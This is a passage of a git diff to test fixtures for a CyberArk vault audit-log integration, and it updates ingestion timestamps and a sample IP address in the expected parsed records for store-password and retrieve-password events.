Value=\\\"1615722505\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CurrInd\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615722505\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" @@ -643,7 +620,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301363300Z", + "ingested": "2021-12-09T13:36:44.612805300Z", "original": "\u003c5\u003e1 2021-03-15T10:12:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"27\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"StartChangeNotBefore\\\" Value=\\\"1615754905\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615231204\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:21\",\"IsoTimestamp\":\"2021-03-15T10:12:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615754905\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" @@ -677,7 +654,7 @@ }, "@timestamp": "2021-03-15T13:13:01.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -693,13 +670,13 @@ "severity": "Info", "iso_timestamp": "2021-03-15T13:13:01Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e294\u003c/MessageID\u003e\n \u003cDesc\u003eStore password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore password\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e294\u003c/MessageID\u003e\n \u003cDesc\u003eStore password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eStore password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eStore password\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813465\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Store password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -712,7 +689,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615813465" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "127.0.0.1", "action": "Store password", @@ -726,8 +703,8 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-06-09T10:24:30.301366200Z", - "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:44.612810100Z", + "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "294", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json index 4ef2367ad25..b470772f336 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json @@ -68,7 +68,7 @@ "event": { "severity": 2, "reason": "AIM password request", - "ingested": "2021-06-09T10:24:30.560288800Z", + "ingested": "2021-12-09T13:36:45.560089Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eProv_PVWA\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.3\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAIM password request\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Nobody\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_PVWA\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.3\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"AIM password request\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Nobody\"}]}}}}", "code": "295", "kind": "event", @@ -168,7 +168,7 @@ "event": { "severity": 2, "reason": "(Action: Show Password)", - "ingested": "2021-06-09T10:24:30.560304700Z", + "ingested": "2021-12-09T13:36:45.560097600Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 